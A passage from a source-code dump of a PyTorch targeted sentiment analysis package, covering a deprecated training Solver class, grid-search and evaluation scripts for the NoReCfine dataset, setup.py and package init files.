In addition, the best model occurred during training is stored,
as well as it's checkpoint to re-load a model at a specific epoch.
Example:
.. code-block:: python
import torch.nn as nn
import torch.optim as optim
model = nn.Sequential(nn.Linear(10, 100), nn.Sigmoid(), nn.Linear(100, 5), nn.ReLU())
optimizer = optim.Adam(model.parameters())
criterion = nn.CrossEntropyLoss(ignore_index = LABEL_PAD_IDX)
solver = BiLSTMSolver(model, optimizer=optimizer, criterion=criterion)
# epochs = number of training loops
# train_iterator = Iterator, DataLoader... Training data
# eval_iterator = Iterator, DataLoader... Eval data
solver.fit(train_iterator, eval_iterator, epochs=epochs)
"""
from abc import ABC, abstractmethod
import torch
import torch.nn as nn
import torch.optim as optim
# Data science
import os
from pathlib import Path
import time
import copy
from sentarget.utils import append2dict, describe_dict, deprecated
@deprecated("Solver instance is deprecated since v0.2. Please use the `Model` class to encapsulate your models instead.")
class Solver(ABC):
    r"""Train and evaluate model.
    * :attr:`model` (Module): model to optimize or test.
    * :attr:`checkpoint` (dict): checkpoint of the best model tested.
    * :attr:`criterion` (Loss): loss function.
    * :attr:`optimizer` (Optimizer): optimizer for weights and biases.
    * :attr:`performance` (dict): dictionary where performances are stored.
        * ``'train'`` (dict): training dictionary.
        * ``'eval'`` (dict): testing dictionary.
    Args:
        model (Module): model to optimize or test.
        criterion (Loss): loss function.
        optimizer (Optimizer): optimizer for weights and biases.
    """

    def __init__(self, model, criterion=None, optimizer=None):
        # Defaults attributes
        self.model = model
        self.criterion = nn.CrossEntropyLoss() if criterion is None else criterion
        self.optimizer = optim.Adam(model.parameters()) if optimizer is None else optimizer
        # Performances (initialized by `reset()`)
        self.best_model = None
        self.performance = None
        self.checkpoint = None
        self.reset()

    def reset(self):
        """Reset the performance dictionary, checkpoint and best model."""
        self.best_model = None
        self.checkpoint = {'epoch': None,
                           'model_name': None,
                           'model_state_dict': None,
                           'optimizer_name': None,
                           'criterion_name': None,
                           'optimizer_state_dict': None,
                           'train': None,
                           'eval': None
                           }
        self.performance = {
            "train": {},
            "eval": {}
        }

    @abstractmethod
    def train(self, iterator, *args, **kwargs):
        r"""Train one time the model on iterator data.
        Args:
            iterator (Iterator): iterator containing batch samples of data.
        Returns:
            dict: the performance and metrics of the training session.
        """
        raise NotImplementedError

    @abstractmethod
    def evaluate(self, iterator, *args, **kwargs):
        r"""Evaluate one time the model on iterator data.
        Args:
            iterator (Iterator): iterator containing batch samples of data.
        Returns:
            dict: the performance and metrics of the training session.
        """
        raise NotImplementedError

    def _update_checkpoint(self, epoch, results_train=None, results_eval=None):
        r"""Update the model's checkpoint. Keep track of its epoch, state, optimizer,
        and performances. In addition, it saves the current model in `best_model`.
        Args:
            epoch (int): epoch at the current training state.
            results_train (dict, optional): metrics for the training session at epoch. The default is None.
            results_eval (dict, optional): metrics for the evaluation session at epoch. The default is None.
        """
        self.best_model = copy.deepcopy(self.model)
        self.checkpoint = {'epoch': epoch,
                           'model_name': self.best_model.__class__.__name__,
                           'model_state_dict': self.best_model.state_dict(),
                           'optimizer_name': self.optimizer.__class__.__name__,
                           'criterion_name': self.criterion.__class__.__name__,
                           # Consistency fix: `reset()` declares this slot but it
                           # was never filled, so saved checkpoints could not
                           # restore the optimizer state.
                           'optimizer_state_dict': self.optimizer.state_dict(),
                           'train': results_train,
                           'eval': results_eval
                           }

    def save(self, filename=None, dirpath=".", checkpoint=True):
        r"""Save the best torch model.
        Args:
            filename (str, optional): name of the model. The default is "model.pt".
            dirpath (str, optional): path to the desired foldre location. The default is ".".
            checkpoint (bool, optional): ``True`` to save the model at the best checkpoint during training.
        """
        if checkpoint:
            # Get the name and other relevant information
            model_name = self.checkpoint['model_name']
            epoch = self.checkpoint['epoch']
            filename = f"model_{model_name}_epoch{epoch}.pt" if filename is None else filename
            # Save in the appropriate directory, and create it if it doesn't exists
            Path(dirpath).mkdir(parents=True, exist_ok=True)
            # Save the best model
            path = os.path.join(dirpath, filename)
            torch.save(self.best_model, path)
            # Save its checkpoint.
            # NOTE(review): this assumes `filename` follows the default
            # "model_<name>_epoch<N>.pt" pattern; a custom filename without
            # an underscore would raise IndexError here — confirm callers.
            checkname = f"checkpoint_{filename.split('.')[-2].split('_')[1]}_epoch{epoch}.pt"
            checkpath = os.path.join(dirpath, checkname)
            torch.save(self.checkpoint, checkpath)
        else:
            # Bug fix: this branch read the name from the checkpoint (None
            # before any training) and ignored `dirpath`. Use the live
            # model's class name and honour the target directory.
            model_name = self.model.__class__.__name__
            filename = f"model_{model_name}.pt" if filename is None else filename
            Path(dirpath).mkdir(parents=True, exist_ok=True)
            torch.save(self.model, os.path.join(dirpath, filename))

    def get_accuracy(self, y_tilde, y):
        r"""Compute accuracy from predicted classes and gold labels.
        Args:
            y_tilde (Tensor): 1D tensor containing the predicted classes for each predictions
                in the batch. This tensor should be computed through `get_predicted_classes(y_hat)` method.
            y (Tensor): gold labels. Note that y_tilde an y must have the same shape.
        Returns:
            float: the mean of correct answers.
        Examples::
            >>> y = torch.tensor([0, 1, 4, 2, 1, 3, 2, 1, 1, 3])
            >>> y_tilde = torch.tensor([0, 1, 2, 2, 1, 3, 2, 4, 4, 3])
            >>> solver.get_accuracy(y_tilde, y)
            0.7
        """
        assert y_tilde.shape == y.shape, "predicted classes and gold labels should have the same shape"
        # Bug fix: torch tensors have no `.astype` (that is the NumPy API);
        # use `.float()` as shown by the docstring's tensor example.
        correct = (y_tilde == y).float()
        # `.item()` returns a plain Python float, which downstream reporting
        # (describe_dict) formats — a 0-dim tensor would be skipped there.
        acc = correct.sum().item() / len(correct)
        return acc

    def fit(self, train_iterator, eval_iterator, *args, epochs=10, **kwargs):
        r"""Train and evaluate a model X times. During the training, both training
        and evaluation results are saved under the `performance` attribute.
        Args:
            train_iterator (Iterator): iterator containing batch samples of data.
            eval_iterator (Iterator): iterator containing batch samples of data.
            epochs (int): number of times the model will be trained.
            verbose (bool, optional): if ``True`` display a progress bar and metrics at each epoch.
                The default is ``True``.
        Examples::
            >>> solver = MySolver(model, criterion=criterion, optimizer=optimizer)
            >>> # Train & eval EPOCHS times
            >>> EPOCHS = 10
            >>> solver.fit(train_iterator, eval_iterator, epochs=EPOCHS, verbose=True)
                Epoch:     1/10
                    Training:   100% | [==================================================]
                    Evaluation: 100% | [==================================================]
                    Stats Training:   | Loss: 0.349 | Acc: 84.33% | Prec.: 84.26%
                    Stats Evaluation: | Loss: 0.627 | Acc: 72.04% | Prec.: 72.22%
            >>> # ...
        """
        # By default, print a log each epoch
        verbose = True if 'verbose' not in {*kwargs} else kwargs['verbose']
        # Keep track of the best model
        best_eval_accuracy = 0
        start_time = time.time()
        # Train and evaluate the model epochs times
        for epoch in range(epochs):
            if verbose:
                print("Epoch:\t{0:3d}/{1}".format(epoch + 1, epochs))
            # Train and evaluate the model
            results_train = self.train(train_iterator, *args, **kwargs)
            results_eval = self.evaluate(eval_iterator, *args, **kwargs)
            # Update the eval dictionary by adding the results at the
            # current epoch
            append2dict(self.performance["train"],
                        results_train)
            append2dict(self.performance["eval"],
                        results_eval)
            if verbose:
                print("\t   Stats Train: | " + describe_dict(results_train))
                print("\t   Stats Eval:  | " + describe_dict(results_eval))
                print()
            # We copy in memory the best model.
            # NOTE(review): assumes `evaluate()` returns an 'accuracy' key.
            if best_eval_accuracy < self.performance["eval"]["accuracy"][-1]:
                best_eval_accuracy = self.performance["eval"]["accuracy"][-1]
                self._update_checkpoint(epoch + 1, results_train, results_eval)
        self.performance['time'] = time.time() - start_time
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,719 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /scripts/gridsearch.py | r"""
Run a simple grid search algorithm.
"""
import configparser
from argparse import ArgumentParser
import numpy
import torch
from torchtext import data
from torchtext.vocab import Vectors
import sentarget
from sentarget.datasets import NoReCfine
from sentarget.tuner import Tuner
def gridsearch(options=None, params_hyper=None, params_model=None, params_optim=None, params_loss=None):
    """Run the grid search algorithms on the CONLL dataset provided.
    Args:
        options (dict, optional): general options.
        params_hyper (dict, optional): hyper parameters to tune.
        params_model (dict, optional): model's parameters to tune.
        params_optim (dict, optional): optimizer parameters to tune.
        params_loss (dict, optional): criterion parameters to tune.
    """
    # Bug fix: the previous `={}` defaults were mutable default arguments,
    # shared across calls; this function writes into `params_model` below,
    # which would have polluted the shared default dict.
    options = {} if options is None else options
    params_hyper = {} if params_hyper is None else params_hyper
    params_model = {} if params_model is None else params_model
    params_optim = {} if params_optim is None else params_optim
    params_loss = {} if params_loss is None else params_loss
    # 1/ Load the data
    TEXT = data.Field(lower=False, include_lengths=True, batch_first=True)
    LABEL = data.Field(batch_first=True, unk_token=None)
    FIELDS = [("text", TEXT), ("label", LABEL)]
    train_data, eval_data, test_data = NoReCfine.splits(FIELDS)
    # 2/ Build the vocab
    VOCAB_SIZE = 1_200_000
    VECTORS_NAME = params_hyper['vectors_name']
    VECTORS_URL = params_hyper['vectors_url']
    VECTORS = Vectors(name=VECTORS_NAME, url=VECTORS_URL)
    TEXT.build_vocab(train_data, test_data, eval_data,
                     max_size=VOCAB_SIZE,
                     vectors=VECTORS,
                     unk_init=torch.Tensor.normal_)
    LABEL.build_vocab(train_data)
    # 3/ Load iterators
    BATCH_SIZE = params_hyper['batch_size']
    device = torch.device('cpu')
    train_iterator, eval_iterator, test_iterator = data.BucketIterator.splits((train_data, eval_data, test_data),
                                                                              batch_size=BATCH_SIZE,
                                                                              sort_within_batch=True,
                                                                              device=device)
    # Initialize the embedding layer from the pre-trained vectors, if requested.
    if params_hyper['use_pretrained_embeddings']:
        params_model['embeddings'] = TEXT.vocab.vectors
    # 4/ Grid Search
    tuner = Tuner(params_hyper=params_hyper,
                  params_model=params_model,
                  params_loss=params_loss,
                  params_optim=params_optim,
                  options=options)
    # Search, then persist the results to the configured save directory.
    tuner.fit(train_iterator, eval_iterator)
    tuner.save(dirsaves=options['dirsaves'])
if __name__ == "__main__":
    # As there are a lot of customizable parameters (the grid search run on all module's parameters)
    # It is more readable to separate the configuration from the code.
    # The configuration file is a .ini format,
    # but you can create your own custom functions depending on the grid search algorithm that you need.
    parser = ArgumentParser()
    parser.add_argument('-c', '--conf', help="Path to the config.ini file to use.", action='store',
                        type=str, default='gridsearch.ini')
    args = parser.parse_args()
    # Read the configuration file
    config = configparser.ConfigParser()
    config.read(args.conf)
    # Each .ini value is a Python expression (lists, numbers, class names, ...)
    # evaluated here into real objects.
    # NOTE(review): `eval` executes arbitrary code from the config file —
    # acceptable for a local experiment script, but never run it on an
    # untrusted config (ast.literal_eval would be safer for plain literals).
    options = {key: eval(value) for (key, value) in dict(config.items('Options')).items()}
    params_hyper = {key: eval(value) for (key, value) in dict(config.items('Hyper')).items()}
    params_model = {key: eval(value) for (key, value) in dict(config.items('Model')).items()}
    params_loss = {key: eval(value) for (key, value) in dict(config.items('Criterion')).items()}
    params_optim = {key: eval(value) for (key, value) in dict(config.items('Optimizer')).items()}
    # Run the gridsearch
    gridsearch(
        params_hyper=params_hyper,
        params_model=params_model,
        params_loss=params_loss,
        params_optim=params_optim,
        options=options
    )
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,720 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/__init__.py | from sentarget.nn import models
from .solver import Solver
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,721 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /setup.py | """
Setup for docs and PyPi.
"""
from setuptools import setup, find_packages
def readme_data():
    """Read the README file."""
    # Used as the long description on PyPI.
    with open("README.md", "r") as readme:
        return readme.read()
# NOTE: a stray `find_packages()` call used to sit here; its result was
# discarded, so it only performed a pointless filesystem scan. The real call
# is the `packages=find_packages()` argument below.
setup(name='sentarget',
      version='0.2',
      description='Targeted Sentiment Analysis',
      long_description=readme_data(),
      long_description_content_type="text/markdown",
      url='https://github.com/arthurdjn/sentarget',
      author='Arthur Dujardin',
      author_email='arthur.dujardin@ensg.eu',
      license='Apache License-2.0',
      # Only installable PyPI distributions belong here: 'pickle', 'json' and
      # 'time' are standard-library modules; 'sklearn' is the deprecated alias
      # of 'scikit-learn'; a missing comma fused 'scipy' with 'seaborn' into
      # the non-existent package 'scipyseaborn' (and 'seaborn' was duplicated).
      install_requires=['torch', 'torchtext', 'numpy', 'pandas', 'scikit-learn',
                        'tqdm', 'scipy', 'seaborn', 'requests'],
      packages=find_packages(),
      zip_safe=False,
      classifiers=[
          # How mature is this project? Common values are
          #   3 - Alpha
          #   4 - Beta
          #   5 - Production/Stable
          # Fixed: '5 - Stable' is not a valid trove classifier.
          'Development Status :: 5 - Production/Stable',
          # Indicate who your project is intended for
          'Intended Audience :: Developers',
          'Topic :: Software Development :: Natural Language Processing and Sentiment Analysis',
          # Specify the Python versions you support here.
          'Programming Language :: Python :: 3',
      ]
      )
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,722 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/__init__.py | from .norecfine import NoReCfine
from .nonlpl import NoNLPL | {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,723 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /scripts/eval.py | """
Main script used to run and test a model, for Targeted Sentment Ananalysis.
The dataset used should be taken from the lattest NoReCfine repository.
"""
import argparse
import torch
from torch import nn
from torch.utils.data import DataLoader
import torchtext
from torchtext.datasets import SequenceTaggingDataset
from torchtext.vocab import Vectors
import numpy as np
import sentarget
from sentarget.datasets import NoReCfine
from sentarget.metrics import ConfusionMatrix
from sentarget.utils import describe_dict
class Eval:
    """
    Evaluate and test our model trained on the NoReCfine dataset.
    This class loads and preprocesses the data, and then evaluates the model.
    """

    def __init__(self, model_path='model.pt', data_path='data', device='cpu'):
        # model_path: path to a pickled torch model (loaded as-is with torch.load in run()).
        # data_path: path to a CONLL-formatted evaluation file (tab-separated token/label).
        # device: torch device string, e.g. 'cpu' or 'cuda'.
        self.model_path = model_path
        self.data_path = data_path
        self.device = device

    @classmethod
    def from_args(cls):
        """Alternate constructor: build an Eval from the --model/--data CLI flags."""
        parser = argparse.ArgumentParser()
        parser.add_argument("--model", "-m", default='model.pt', type=str,
        help='Path to the saved pytorch model.')
        parser.add_argument("--data", "-d", default='data/test.conll', type=str,
        help='Path to the dataset, in the same format as NoReC dataset.')
        args = parser.parse_args()
        return Eval(model_path=args.model, data_path=args.data)

    def run(self):
        """Preprocess the data, load the saved model and print its evaluation metrics.
        """
        # Extract Fields from a CONLL dataset file
        TEXT = torchtext.data.Field(lower=False, include_lengths=True, batch_first=True)
        LABEL = torchtext.data.Field(batch_first=True, unk_token=None)
        FIELDS = [("text", TEXT), ("label", LABEL)]
        # Vocabularies are built from the *training* split below so the eval
        # data is mapped with the same word/label indices the model saw.
        train_data, eval_data, test_data = NoReCfine.splits(FIELDS)
        data = SequenceTaggingDataset(self.data_path, FIELDS, encoding="utf-8", separator="\t")
        # Build the vocabulary
        VOCAB_SIZE = 1_200_000
        # NOTE(review): downloads the NLPL embedding archive on first use -- confirm caching/offline behavior.
        VECTORS = Vectors(name='model.txt', url='http://vectors.nlpl.eu/repository/20/58.zip')
        # Create the vocabulary for words embeddings
        TEXT.build_vocab(train_data,
        max_size=VOCAB_SIZE,
        vectors=VECTORS,
        unk_init=torch.Tensor.normal_)
        LABEL.build_vocab(train_data)
        # General information
        text_length = [len(sentence) for sentence in list(data.text)]
        print(f"\nNumber of sentences in {self.data_path}: {len(text_length):,}")
        print(f'Number of words in {self.data_path}: {sum(text_length):,}')
        # Generate iterator made of 1 example
        BATCH_SIZE = 1
        device = torch.device(self.device)
        iterator = torchtext.data.BucketIterator(data,
        batch_size=BATCH_SIZE,
        sort_within_batch=True,
        device=device)
        # Loss function; index 0 (<pad>) is ignored and the remaining class
        # weights compensate for label imbalance.
        # NOTE(review): weights assume a fixed 6-label vocabulary order -- verify against LABEL.vocab.
        criterion = nn.CrossEntropyLoss(ignore_index=0, weight=torch.tensor(
        [1, 0.06771941, 0.97660534, 0.97719714, 0.98922782, 0.98925029]))
        # Load the model
        model = torch.load(self.model_path)
        # Make sure the dictionary containing performances / scores is empty before running the eval method
        # model.reset()
        performance = model.evaluate(iterator, criterion, verbose=True)
        print(describe_dict(performance, sep_key=' | ', sep_val=': ', pad=True))
        confusion = ConfusionMatrix(data=performance['confusion'])
        print("confusion matrix:")
        print(np.array2string(confusion.normalize(), separator=', ', precision=3, floatmode='fixed'))
if __name__ == "__main__":
    # CLI entry point: parse --model/--data and run the evaluation.
    Eval.from_args().run()
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,724 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/tuner/__init__.py | from .tuner import Tuner
from .functional import * | {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,725 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/__init__.py | from sentarget import datasets, metrics, nn
from sentarget.tuner import Tuner
from sentarget.nn import Solver
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", 